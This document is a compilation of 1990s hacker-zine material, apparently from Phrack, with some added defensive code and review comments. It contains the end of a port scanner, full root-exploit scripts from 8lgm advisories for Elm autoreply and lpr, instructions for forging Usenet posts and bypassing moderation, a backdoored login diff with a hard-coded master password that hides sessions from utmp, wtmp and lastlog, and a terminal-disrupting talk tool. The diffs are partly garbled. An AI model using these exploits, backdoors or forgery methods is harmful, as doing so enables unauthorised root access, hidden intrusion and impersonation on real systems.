            (char *) &TargetHostAddr;
        TargetHost.h_length = sizeof(struct in_addr);
        TargetHost.h_addrtype = AF_INET;
        TargetHost.h_aliases = 0;
        HostEntryPointer = &TargetHost;
    }
    SocketInetAddr.sin_family = HostEntryPointer->h_addrtype;
    bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr,
        HostEntryPointer->h_length);

    for (Port = 1; Port < 65536; Port++)
        (void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr);

    return (RETURN_SUCCESS);
}

Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr)
    unsigned Port;
    struct hostent *HostEntryPointer;
    struct sockaddr_in SocketInetAddr;
{
    char Buffer[BUFSIZ];
    int SocketDescriptor;
    struct servent *ServiceEntryPointer;

    /* sin_port and getservbyport() both take network byte order. */
    SocketInetAddr.sin_port = htons(Port);
    SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6);
    if (SocketDescriptor < 0)
    {
        perror("socket");
        return (RETURN_ERR);
    }
    if (Verbose)
    {
        (void) printf("Host %s, Port %d ", HostEntryPointer->h_name,
            Port);
        if ((ServiceEntryPointer = getservbyport(htons(Port), "tcp")) !=
            (struct servent *) NULL)
            (void) printf(" (\"%s\" service) ",
                ServiceEntryPointer->s_name);
        (void) printf("connection ... ");
        (void) fflush(stdout);
    }
    if (connect(SocketDescriptor, (struct sockaddr *) &SocketInetAddr,
        sizeof(SocketInetAddr)) < 0)
    {
        if (Verbose)
            (void) printf("NOT open.\n");
        if (Debug)
            perror("connect");
    }
    else
    {
        if (!Verbose)
        {
            (void) printf("Host %s, Port %d ",
                HostEntryPointer->h_name, Port);
            if ((ServiceEntryPointer = getservbyport(htons(Port), "tcp")) !=
                (struct servent *) NULL)
                (void) printf(" (\"%s\" service) ",
                    ServiceEntryPointer->s_name);
            (void) printf("connection ... ");
            (void) fflush(stdout);
        }
        (void) printf("open.\n");

        if (Hack)
        {
            (void) sprintf(Buffer, "/usr/ucb/telnet %s %d",
                HostEntryPointer->h_name, Port);
            (void) system(Buffer);
        }
    }

    (void) close(SocketDescriptor);
    return (RETURN_SUCCESS);
}


[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991


PROGRAM:

        autoreply(1)    (/usr/local/bin/autoreply)
                        Supplied with the Elm Mail System

VULNERABLE OS's:

        Any system with a standard installation of The Elm Mail System.
        All versions are believed to have this vulnerability.

DESCRIPTION:

        autoreply(1) can be used to create root owned files, with mode
        666. It can also overwrite any file with semi user-controlled
        data.

IMPACT:

        Any user with access to autoreply(1) can alter system files and
        thus become root.

REPEAT BY:

        This example demonstrates how to become root on most affected
        machines by modifying root's .rhosts file. Please do not do
        this unless you have permission.

        Create the following script, 'fixrhosts':

8< cut here
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
        echo "Usage: `basename $0` rhosts-file user machine"
        exit 1
fi

RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"

cd $HOME
echo x > "a
$MACHINE $USERNAME
b"
umask 022
autoreply "a
$MACHINE $USERNAME
b"

cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF

/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS

rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"
exit 0
8< cut here

        (Lines marked with > represent user input)

>       % id
        uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
>       % ./fixrhosts ~root/.rhosts 8lgm localhost
        You've been added to the autoreply system.
        You've been removed from the autoreply table.
>       % rsh localhost -l root csh -i
        Warning: no access to tty.
        Thus no job control in this shell.
        #

FIX:

        1. Disable autoreply.
        2. Wait for a patch from the Elm maintainers.


[8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991


PROGRAM:

        lpr(1)          (/usr/ucb/lpr or /usr/bin/lpr)

VULNERABLE OS's:

        SunOS 4.1.1 or earlier
        BSD 4.3
        BSD NET/2 Derived Systems
        A/UX 2.0.1

        Most systems supporting the BSD LP subsystem

DESCRIPTION:

        lpr(1) can be used to overwrite or create (and become owner of)
        any file on the system. lpr -s allows users to create symbolic
        links in lpd's spool directory (typically /var/spool/lpd).
        After 1000 invocations of lpr, lpr will reuse the filename in
        the spool directory, and follow the link previously installed.
        It will thus overwrite/create any file that this link points to.

IMPACT:

        Any user with access to lpr(1) can alter system files and thus
        become root.

REPEAT BY:

        This example demonstrates how to become root on most affected
        machines by modifying /etc/passwd and /etc/group. Please do
        not do this unless you have permission.

        Create the following script, 'lprcp':

8< cut here
#!/bin/csh -f
#
# Usage: lprcp from-file to-file
#
if ($#argv != 2) then
        echo Usage: lprcp from-file to-file
        exit 1
endif

# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$              # lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$           # to where we really want

@ s = 0
while ( $s != 999)              # loop 999 times
        lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
        @ s++
        if ( $s % 10 == 0 ) echo -n .
end

lpr $1                          # incoming file
                                # user becomes owner
rm -f /tmp/.tmp.$$
exit 0
8< cut here

        (Lines marked with > represent user input)

Make copies of /etc/passwd and /etc/group, and modify them:
>       % id
        uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
>       % cp /etc/passwd /tmp/passwd
>       % ex /tmp/passwd
        /tmp/passwd: unmodified: line 42
>       :a
>       8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
>       .
>       :wq
        /tmp/passwd: 43 lines, 2188 characters.
>       % cp /etc/group /tmp
>       % ex /tmp/group
        /tmp/group: unmodified: line 49
>       :/wheel
        wheel:*:0:root,operator
>       :c
>       wheel:*:0:root,operator,8lgm
>       .
>       :wq
        /tmp/group: 49 lines, 944 characters.

Install our new files:
>       % ./lprcp /tmp/group /etc/group
        lpr: cannot rename /var/spool/lpd/cfA060testnode
>       % ./lprcp /tmp/passwd /etc/passwd
        lpr: cannot rename /var/spool/lpd/cfA061testnode

Check it worked:
>       % ls -l /etc/passwd /etc/group
        -rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group
        -rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd
>       % head -1 /etc/group
        wheel:*:0:root,operator,8lgm
>       % grep '^8lgmroot' /etc/passwd
        8lgmroot::0:0:Test account for lpr bug:/:/bin/csh

Become root and tidy up:
>       % su 8lgmroot
        # chown root /etc/passwd /etc/group
        # rm -f /tmp/passwd /tmp/group

FIX:

        1. Contact your vendor for a fix.

        2. In the meantime, apply the following patch, derived from
           BSD NET/2 source, which will correct the flaw on most
           affected systems:
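Both 8lgm advisories above come down to a privileged program writing through a predictable name that an unprivileged user has planted as a symbolic link. The C program below is an added example, not the patch the advisory refers to and not Elm or BSD code: it shows the vulnerable open beside a hardened one and runs both against a link planted in a private temporary directory. The function names `naive_create`, `safe_create` and `victim_clobbered`, and the file names used in the demo, are hypothetical.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern both advisories describe: open a predictable name and write,
 * following whatever is already there. */
static int naive_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form: the name must not exist yet (O_EXCL), a symbolic link in
 * the final component is refused (O_NOFOLLOW), the mode is restrictive, and
 * the descriptor must refer to a regular file with exactly one link. */
static int safe_create(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);

    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

static long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long) st.st_size : -1L;
}

/* Plant a link named like a spool file that points at a "victim" file, then
 * let creator() open the spool name and write one byte.
 * Returns 1 if the victim was overwritten, 0 if it survived, -1 on setup error. */
static int victim_clobbered(int (*creator)(const char *))
{
    char dir[] = "/tmp/symdemoXXXXXX", victim[64], spool[64];
    int fd, clobbered;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(spool, sizeof spool, "%s/arep.000042", dir);

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0 || write(fd, "original\n", 9) != 9)
        return -1;
    close(fd);
    if (symlink(victim, spool) != 0)          /* the pre-planted link */
        return -1;

    fd = creator(spool);
    if (fd >= 0) {
        if (write(fd, "x", 1) != 1)
            perror("write");
        close(fd);
    }
    clobbered = file_size(victim) != 9;

    unlink(spool);
    unlink(victim);
    rmdir(dir);
    return clobbered;
}

int main(void)
{
    printf("naive open: victim %s\n",
           victim_clobbered(naive_create) ? "OVERWRITTEN" : "intact");
    printf("safe open:  victim %s\n",
           victim_clobbered(safe_create) ? "OVERWRITTEN" : "intact");
    return 0;
}
```

A spooler that must reuse names, as lpr does after its sequence number wraps, needs the same refusal on every reuse, not only on first creation.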


Anonymous netnews without "anonymous" remailers


Save any news article to a file. We'll call it "hak" in this example.
Edit hak, and remove any header lines of the form

        From some!random!path!user   (note: "From ", not "From: " !!)
        Article:
        Lines:

Shorten the Path: header down to its LAST two or three "bangized" components.
This is to make the article look like it was posted from where it really was
posted, and originally hit the net at or near the host you send it to. Or
you can construct a completely new Path: line to reflect your assumed alias.

Make some change to the Message-ID: field, that isn't likely to be
duplicated anywhere. This is usually best done by adding a couple of
random characters to the part before the @, since news posting programs
generally use a fixed-length field to generate these IDs.

Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc. Replace the original message text with your message.

If you are posting to a moderated group, remember to put in an Approved:
header to bypass the moderation mechanism.

Write out the changed file, and send it to your favorite NNTP server that
permits transfers via the IHAVE command, using the following script:

#! /bin/sh
## Post an article via IHAVE.
## args: filename server

if test "$2" = "" ; then
  echo usage: $0 filename server
  exit 1
fi
if test ! -f $1 ; then
  echo $1: not found
  exit 1
fi

# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
  sed 's/.*-[Ii][Dd]: //'`
echo $msgid

( sleep 5
  echo IHAVE $msgid
  sleep 3
  cat $1
  sleep 1
  echo "."
  sleep 1
  echo QUIT ) | telnet $2 119


If your article doesn't appear in a day or two, try a different server.
They are easy to find. Here's a script that will break a large file
full of saved netnews into a list of hosts to try. Edit the output
of this if you want, to remove obvious peoples' names and other trash.

#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp

Once you have your host list, feed it to the following script.

#! /bin/sh

while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
sleep 5
echo ihave k001@x.edu
sleep 4
echo
echo quit
sleep 1
echo quit
) | telnet
done

If the above script is called "findem" and you're using csh, you should do

        findem < list >& outfile

so that ALL output from telnet is captured. This takes a long time, but when
it finishes, edit "outfile" and look for occurrences of "335". These mark
answers from servers that might be willing to accept an article. This isn't a
completely reliable indication, since some servers respond with acceptance and
later drop articles. Try a given server with a slightly modified repeat of
someone else's message, and see if it eventually appears.

You will notice other servers that don't necessarily take an IHAVE, but
say "posting ok". You can probably do regular POSTS through these, but they
will add an "NNTP-Posting-Host: " header containing the machine YOU came from.


Magic Login - Written by Data King - 7 July 1994 


PLEASE NOTE:-


This program code is released on the understanding that neither the 
author or Phrack Magazine suggest that you implement this on **ANY** 
system that you are not authorized to do so. The author provides this 
implementation of a "Magic" login as a learning exercise in security 
programming. 


Sorry for the disclaimer readers but I was advised by the AFP (Australian 
Federal Police) that if I ever released this code they would bust me for 
aiding and abetting. I am releasing it anyway as I believe in the right of 
people to KNOW, but not necessarily to DO. 


As always I can be emailed at dking@suburbia.apana.org.au 
(Please note:- I have a NEW pgp signature.) 


INTRODUCTION 

Briefly I am going to explain what a "Magic" login is and some of the steps you
need to go through to receive the desired result. At the end of this article is
a diff that can be applied to the shadow-3.2.2-linux archive to implement some
of these ideas.


EXPLANATION 


A "Magic" login is a modified login program that allows the user to login 
without knowing the correct password for the account they are logging into. 


This is a very simple programming exercise and can be done by almost anyone, but 
a really effective "Magic" login program will do much more than this. The 
features of the supplied "Magic" login are: 


- Will login to any valid account as long as you know the Magic password.

- Hides you in UTMP

- Does not Log to WTMP

- Allows Root Login from NON authorized Terminals

- Preserves the Lastlogin information (ie Keeps it as though you had never
  logged in with the magic password)

- Produces a binary that is exactly the same length as the original binary.


IMPLEMENTATION 


I am not going to go into great detail here on how to write such a system as 
this. The code is very simple and it contains plenty of comments, so just look 
there for ideas. 


For this system to have less chance of being detected you need to do several 
things. 


First select a "Magic" password that is not easily identifiable by stringing the 
binary. This is why in the example I have used the word "CONSOLE", this word 
already appears several times in the binary so detection of one more is 
unlikely. 


Admittedly I could have encrypted the "Magic" password, but I decided against this
for several reasons.


The second thing you would need to do if you were illegally placing a "Magic"
login on a system would be to ensure that the admins are not doing CRC checks on
SUID(0) programs, or if they are that you change the CRC record of login to
match the CRC record of the "Magic" login.


Thirdly do not forget to make the date and time stamp of the new binary match
the old ones.


To install a new /bin/login on a system you will need to be root, now if you are
already root why would you bother? Simple, it is just one more backdoor that you
can use to get back in if you are detected.


LIMITATIONS


This version of the "Magic" login program does not have the following features,
I leave it entirely up to you about implementing something to fix them:


- Shells & Programs show up in the Process Table
- tty Ownership and attributes
- /proc filesystem


Any one of these to an alert system admin will show that there is an "invisible"
user on the system. However it has been my experience that most admins rarely
look at these things, or if they do they can not see the wood for the trees.
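
The cross-check that the list above implies, written from the administrator's side as an added example (not part of Data King's article or of the shadow suite): a tty that is allocated but has no utmp record is exactly the mismatch a login that skips utmp leaves behind. It assumes Linux with /dev/pts and <utmpx.h>; the names tty_obs, unaccounted_ttys, read_pts and read_utmp_lines are this example's own.

```c
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <utmpx.h>

#define MAX_TTYS 256
#define LINE_LEN 40

struct tty_obs {
    char line[LINE_LEN];   /* name relative to /dev, e.g. "pts/3" */
    unsigned uid;          /* owner of the device node */
};

/* Core check: collect the indexes of observed ttys whose line does not
 * appear in the utmp list. Returns how many were written to out[]. */
size_t unaccounted_ttys(const struct tty_obs *obs, size_t nobs,
                        char utmp_lines[][LINE_LEN], size_t nutmp,
                        size_t *out, size_t cap)
{
    size_t found = 0;
    for (size_t i = 0; i < nobs; i++) {
        int listed = 0;
        for (size_t j = 0; j < nutmp && !listed; j++)
            listed = strcmp(obs[i].line, utmp_lines[j]) == 0;
        if (!listed && found < cap)
            out[found++] = i;
    }
    return found;
}

/* USER_PROCESS records are the sessions who(1) would show. */
size_t read_utmp_lines(char lines[][LINE_LEN], size_t cap)
{
    struct utmpx *u;
    size_t n = 0;

    setutxent();
    while (n < cap && (u = getutxent()) != NULL) {
        size_t k = 0;
        if (u->ut_type != USER_PROCESS)
            continue;
        /* ut_line is a fixed-size field and need not be NUL-terminated */
        while (k < sizeof u->ut_line && k < LINE_LEN - 1 && u->ut_line[k]) {
            lines[n][k] = u->ut_line[k];
            k++;
        }
        lines[n][k] = '\0';
        n++;
    }
    endutxent();
    return n;
}

/* Allocated pseudo-terminals appear as numeric nodes under /dev/pts. */
size_t read_pts(struct tty_obs *obs, size_t cap)
{
    DIR *d = opendir("/dev/pts");
    struct dirent *e;
    size_t n = 0;

    if (d == NULL)
        return 0;
    while (n < cap && (e = readdir(d)) != NULL) {
        char path[300];
        struct stat st;
        if (e->d_name[0] < '0' || e->d_name[0] > '9')
            continue;                       /* skips ".", ".." and ptmx */
        if (strlen(e->d_name) > 16)
            continue;                       /* not a pty number */
        snprintf(path, sizeof path, "/dev/pts/%s", e->d_name);
        if (stat(path, &st) != 0)
            continue;
        snprintf(obs[n].line, LINE_LEN, "pts/%s", e->d_name);
        obs[n].uid = (unsigned)st.st_uid;
        n++;
    }
    closedir(d);
    return n;
}

int main(void)
{
    static struct tty_obs obs[MAX_TTYS];
    static char ut[MAX_TTYS][LINE_LEN];
    size_t hits[MAX_TTYS];
    size_t nobs = read_pts(obs, MAX_TTYS);
    size_t nut = read_utmp_lines(ut, MAX_TTYS);
    size_t n = unaccounted_ttys(obs, nobs, ut, nut, hits, MAX_TTYS);

    for (size_t i = 0; i < n; i++)
        printf("/dev/%s (owner uid %u) has no utmp record\n",
               obs[hits[i]].line, obs[hits[i]].uid);
    return n ? 1 : 0;
}
```

Terminal multiplexers and some terminal emulators allocate ptys without writing utmp, so a hit is a lead to check against the process table, not proof of a modified login.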


diff -c /root/work/login/console.c /root/work/logon/console.c 
*** /root/work/login/console.c Sun Oct 11 07:16:47 1992 
--- /root/work/logon/console.c Sat Jun 4 15:29:15 1994 


KKKKKKKKKKKKKKK 


KKK 21,26 KKKK 


extern char *getdef_str(); 
+ extern int magik; 


/* 


* tty - return 1 if the "tty" is a console device, else 0. 
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KAKKKKKKKKKKKKKK 
KkK* 47,52 KKK 
--- 48,57 ---- 
if ((console = getdef_str("CONSOLE")) == NULL) 
return 1; 


+ /* Fix for Magic Login - UnAuth Console - Data King */ 


+ if (magik==1) 
+ return 1; 
/* 
* Tf this isn’t a filename, then it is a ":" delimited list of 
* console devices upon which root logins are allowed. 
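Review bot: The added `if (magik==1) return 1;` in the second console.c hunk sits ahead of the ":" delimited device-list handling, so whenever the flag is set the function reports every tty as a permitted console and the configured list is never consulted. A terminal policy check should depend only on the tty name and the CONSOLE setting; a test on an externally set global does not belong in this function and the hunk should be rejected.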
diff -c /root/work/login/Ilmain.c /root/work/logon/lmain.c 
*** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992 
--- /root/work/logon/lmain.c Sat Jun 4 15:30:37 1994 
KKKKKKKKKKKKKKK 
KK*K 105, 110 KKK 
--- 105,111 ---- 
char *Prog; 
int newenve = 0; 
int maxenv = MAXENV; 
+ int magik; /* Global Flag for Magic Login - Data King */ 


/* 
* External identifiers. 
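Review bot: `int magik;` is introduced in lmain.c as a file-scope global with external linkage and no shared header, which means any translation unit can read or set authentication state by redeclaring it by hand. State that changes how a login is checked and recorded should not be a free-standing global; at minimum it would be declared once in a header and written only by the authentication routine, and its purpose would be documented beyond the one-line comment here.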

diff -c /root/work/login/log.c /root/work/logon/log.c 

*** /root/work/login/log.c Mon Oct 12 17:35:07 1992 

--- /root/work/logon/log.c Sat Jun 4 15:37:22 1994 


KKKKKKKKKKKKKKK 


KKK 53,58 KKKK 

S251. 535 99 Sas = 
extern struct passwd pwent; 
extern struct lastlog lastlog; 
extern char **environ; 

+ extern char magik; 


long lseek (); 
time_t time (); 
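Review bot: `extern char magik;` in this log.c hunk does not match the definition `int magik;` added in lmain.c. A declaration whose type differs from the definition is undefined behaviour, and a one-byte read of an int gives a different answer depending on byte order; hand-written extern lines scattered across files are how this kind of mismatch gets in.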
KKKKKKK KK KKK KKK 
KK* 83,89 KKKK 
void) time (&newlog.11l_time); 


void) strncpy (newlog.1ll_line, utent.ut_line, sizeof newlog.1ll_line); 
id) lseek (fd, offset, 0); 
! void) write (fd, (char *) &newlog, sizeof newlog); 
) 


close (fd); 


soe 84, 93).so = 
(void) time (&newlog.11l_time); 
(void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.1ll_line); 
(void) lseek (fd, offset, 0); 
! if (magik !=1) /* Dont Modify Last login Specs if this is a Magic */ 
! /* login - Data King */ 
! 
! 


(void) write (fd, (char *) &newlog, sizeof newlog); 


(void) close (fd); 
} 
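Review bot: Guarding the `write` of `newlog` with `if (magik !=1)` in the 84,93 version means a successful login can leave lastlog untouched, so the last-login record stops being evidence of who actually logged in. The lastlog update has to be unconditional for every session that reaches this code. Separately, both versions discard the results of `lseek` and `write` with `(void)`, so a failed update is silent either way.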


diff -c /root/work/login/utmp.c /root/work/logon/utmp.c 
*** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992 
--- /root/work/logon/utmp.c Sat Jun 4 15:41:13 1994 
KKKKKKKKKKKKKKK 
kkk T0545 KKK*K 
--- 70,77 ---- 

extern long lseek(); 

#endif /* SVR4 */ 
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+ extern int magik; 


define NO_UTENT \ 
"No utmp entry. You must exec \"login\" from the lowest level \"sh\"" 
define NO_TTY \ 
KKKKKKKKKKKKKKK 
KK*K 353,368 KKKK 
/* 

* Scribble out the new entry and close the file. We’re don 

* with UTMP, next we do WIMP (which is real easy, put it on 
| * the end of the file. 
* 


! 

! (void) write (fd, &utmp, sizeof utmp); 
! (void) close (fd); 
! 
! 


if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { 
(void) write (fd, &utmp, sizeof utmp); 
(void) close (fd); 
} 
= utent = utmp; 
#endif /* SVR4 */ 
} 
--- 355,372 ---- 
/* 
* Scribble out the new entry and close the file. We’re don 
* with UTMP, next we do WTMP (which is real easy, put it on 
| * the end of the file. If Magic Login, DONT write out UTMP - Data King 
*/ 
! if (magik !=1) 
! { 
(void) write (fd, &utmp, sizeof utmp); 
(void) close (fd); 


at if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { 
+ (void) write (fd, &utmp, sizeof utmp); 
+ (void) close (fd); 
+ } 
+ utent = utmp; 
} 

#endif /* SVR4 */ 

} 
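Review bot: In the 355,372 version both the utmp `write` and the WTMP append are wrapped in `if (magik !=1) { ... }`, so a session can exist with no utmp or wtmp record at all, and because `(void) close (fd);` sits inside the same block the utmp descriptor is left open on that path. Session accounting must be written for every login regardless of how the password check passed; the condition should be removed and the hunk rejected.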
diff -c /root/work/login/valid.c /root/work/logon/valid.c 
*x** /root/work/login/valid.c Sun Oct 11 07:16:55 1992 
--- /root/work/logon/valid.c Sat Jun 4 15:47:28 1994 
KKKKKKKKKKKKKKK 
KkK* 25,30 KKK 
—-- 25,32 ---- 
static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91"; 
#endif 


+ extern int magik; 


/* 
* valid - compare encrypted passwords 
* 


KKKKKKKKKKKKKKK 


KKK 43,48 KKKK 
—-- 45,64 ---- 

char *encrypt; 

char *salt; 

char *pw_encrypt (); 
+ char *magic; 


+ /* 

+ * Below is the piece of code that checks to see if the password 
+ * supplied by the user = the Magic Password - Data King 

a * / 
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+ magic = "CONSOLE"; /* Define this as the Magic Password - Data King */ 


+ aif (strcmp(password,magic) == 0) 
+ { 

+ magik = 1; 

+ return (1); 


+ 


/* 


* Start with blank or empty password entries. Always encrypt 
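Review bot: The added `strcmp(password,magic) == 0` test in the 45,64 version returns 1 before the existing comparison that begins at "Start with blank or empty password entries" is reached, so one cleartext literal (`"CONSOLE"`) is accepted for any account and the stored encrypted password is never examined. A hard-coded credential inside the password comparison routine is a backdoor by construction and the hunk should be rejected outright; setting the global `magik` as a side effect here is also what the console.c, log.c and utmp.c hunks depend on.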


/* flash.c */


/* This little program is intended to quickly mess up a user's
   terminal by issuing a talk request to that person and sending
   vt100 escape characters that force the user to logout or kill
   his/her xterm in order to regain a sane view of the text.

   If the user's message mode is set to off (mesg n) he/she will
   be unharmed.
   This program is really nasty :-)


   Usage: flash user@host


   try compiling with: gcc -o flash flash.c
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>


/* this should really be in an include file.. */
#define OLD_NAME_SIZE 9
#define NAME_SIZE 12
#define TTY_SIZE 16
typedef struct {
    char type;
    char l_name[OLD_NAME_SIZE];
    char r_name[OLD_NAME_SIZE];
    char filler;
    u_long id_num;
    u_long pid;
    char r_tty[TTY_SIZE];
    struct sockaddr_in addr;
    struct sockaddr_in ctl_addr;
} OLD_MSG;


typedef struct {
    u_char vers;
    char type;
    u_short filler;
    u_long id_num;
    struct sockaddr_in addr;
    struct sockaddr_in ctl_addr;
    long pid;
    char l_name[NAME_SIZE];
    char r_name[NAME_SIZE];
    char r_tty[TTY_SIZE];
} CTL_MSG;


#define TALK_VERSION 1 /* protocol version */

/* Types */
#define LEAVE_INVITE 0
#define LOOK_UP 1
#define DELETE 2
#define ANNOUNCE 3

int current = 1; /* current id... this to avoid duplications */


struct sockaddr_in *getinaddr(char *hostname, u_short port)
{
    static struct sockaddr addr;
    struct sockaddr_in *address;
    struct hostent *host;

    address = (struct sockaddr_in *)&addr;
    (void) bzero( (char *)address, sizeof(struct sockaddr_in) );

    /* fill in the easy fields */
    address->sin_family = AF_INET;
    address->sin_port = htons (port);

    /* first, check if the address is an ip address */
    address->sin_addr.s_addr = inet_addr (hostname);
    if ( (int)address->sin_addr.s_addr == -1)
    {
        /* it wasn't.. so we try it as a long host name */
        host = gethostbyname (hostname);
        if (host)
        {
            /* wow. It's a host name.. set the fields */
            /* ?? address->sin_family = host->h_addrtype; */
            bcopy( host->h_addr, (char *)&address->sin_addr,
                   host->h_length);
        }
        else
        {
            /* oops.. can't find it.. */
            puts ("Couldn't find address");
            exit (-1);
            return (struct sockaddr_in *)0;
        }
    }
    /* all done. */
    return (struct sockaddr_in *)address;
}


SendTalkPacket (struct sockaddr_in *target, char *p, int psize)
{
    int s;
    struct sockaddr sample; /* not used.. only to get the size */

    s = socket (AF_INET, SOCK_DGRAM, 0);
    sendto( s, p, psize, 0, (struct sockaddr *)target, sizeof (sample) );
}


new_ANNOUNCE (char *hostname, char *remote, char *local)
{
    CTL_MSG packet;
    struct sockaddr_in *address;

    /* create a packet */
    address = getinaddr (hostname, 666 );
    address->sin_family = htons (AF_INET);

    bzero( (char *)&packet, sizeof(packet) );
    packet.vers = TALK_VERSION;
    packet.type = ANNOUNCE;
    packet.pid = getpid();
    packet.id_num = current;
    bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
    bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr) );
    strncpy( packet.l_name, local, NAME_SIZE);
    strncpy( packet.r_name, remote, NAME_SIZE);
    strncpy( packet.r_tty, "", 1);

    SendTalkPacket ( getinaddr (hostname, 518), (char *)&packet, sizeof(packet) );
}


old_ANNOUNCE (char *hostname, char *remote, char *local)
{
    OLD_MSG packet;
    struct sockaddr_in *address;

    /* create a packet */
    address = getinaddr (hostname, 666 );
    address->sin_family = htons (AF_INET);

    bzero( (char *)&packet, sizeof(packet) );
    packet.type = ANNOUNCE;
    packet.pid = getpid();
    packet.id_num = current;
    bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
    bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr) );
    strncpy( packet.l_name, local, NAME_SIZE);
    strncpy( packet.r_name, remote, NAME_SIZE);
    strncpy( packet.r_tty, "", 1);

    SendTalkPacket ( getinaddr (hostname, 517), (char *)&packet, sizeof(packet) );
}


main(int argc, char *argv[])
{
    char *hostname, *username;
    int pid;

    if ( (pid = fork()) == -1)
    {
        perror("fork()");
        exit (-1);
    }
    if ( !pid )
    {
        exit (0);
    }
    if (argc < 2) {
        puts ("Usage: <finger info> ");
        exit (5);
    }

    username = argv[1];
    if ( (hostname = (char *)strchr(username, '@')) == NULL )
    {
        puts ("Invalid name. ");
        exit (-1);
    }
    *hostname = '\0';
    hostname++;

    if (*username == '~')
        username++;

#define FIRST "\033c\033(0\033#8"
#define SECOND "\033[1;3r\033[J"
#define THIRD "\033[5m\033[?5h"
    new_ANNOUNCE (hostname, username, FIRST);
    old_ANNOUNCE (hostname, username, FIRST);
    current++;


-:[ Phrack Pro-Phile ]:-

This issue our prophile introduces you to one of the craziest people 
I’ve ever met from the Underground. And coming from a complete loon 
like me, that’s saying something. This guy is a real Renaissance Man: 
Hacker, programmer, burglar, convict, star of stage and screen... 
Of course, that someone could only be: 


Minor Threat 


Personal Info: 


Handle: Minor Threat 
Call him: MT, minor, lamer 
Born: 1972 in Walnut Creek, California 
Age: 22 
Height: 6’1" 
Weight: 155 lbs 
e-mail: mthreat@paranoia.com 
www: http://www.paranoia.com/~mthreat/
Affiliations: Dark Side Research 
Computers owned: 1981: IBM PC 
1982: none 
1984: PCjr 
1988: XT Clone 
1990: 386/25 Clone 
1992: Too many to legally list 
1994: Pentium & 486 


How I got started 


In 1981, my dad worked for IBM. In October of that year, he 
brought home a PC, and I jumped on BASIC. It wasn’t until 1984 that 
I got my first modem. I had just moved to Florida with my dad, and 
he had a modem. I met some other kids with computers and modems and 
they taught me what modems were for: "You call other people’s 
computers and try to get their passwords and intercept their mail". 
(That’s what I was taught!) It wasn’t until a few months later I 
realized that this wasn’t the actual purpose of BBSs and modems. 

My first BBS was the Towne Crier BBS at FAU (Florida Atlantic 
University), 305-393-3891 (I still remember that damn number), but 
the NPA has since changed to 407. We thought it was so cool when 
we logged on as "All" and deleted all the messages posted to "All". 


In about 1985, I moved back to Austin. I screwed around for 
several years without doing any real hacking. When I got to high 
school, I wanted to change my grades like in War Games, so I looked 
through the counselor’s office until I found a number to the 
Education Service Center. I had to scan a whole _100_ numbers 
(929-13xx) to find the HP3000 dialup. Once I found it, I had no 
idea what to do. I gave the number to a friend in high school,
who gave it to some of his hacker friends. They hacked it and gave
it back to me, complete with a full list of passwords and commands. 
It turns out, the two Austin hackers who did it were The Mentor and 
Erik Bloodaxe, but I didn’t know that for another 3 years. 


Shortly after this, I picked my permanent handle. Minor Threat 
was an early-to-mid 1980’s punk band from Washington, DC. They’re no
longer together, but Fugazi is pretty good and Ian MacKaye (from
Minor Threat) is in Fugazi. I actually got the handle off of one
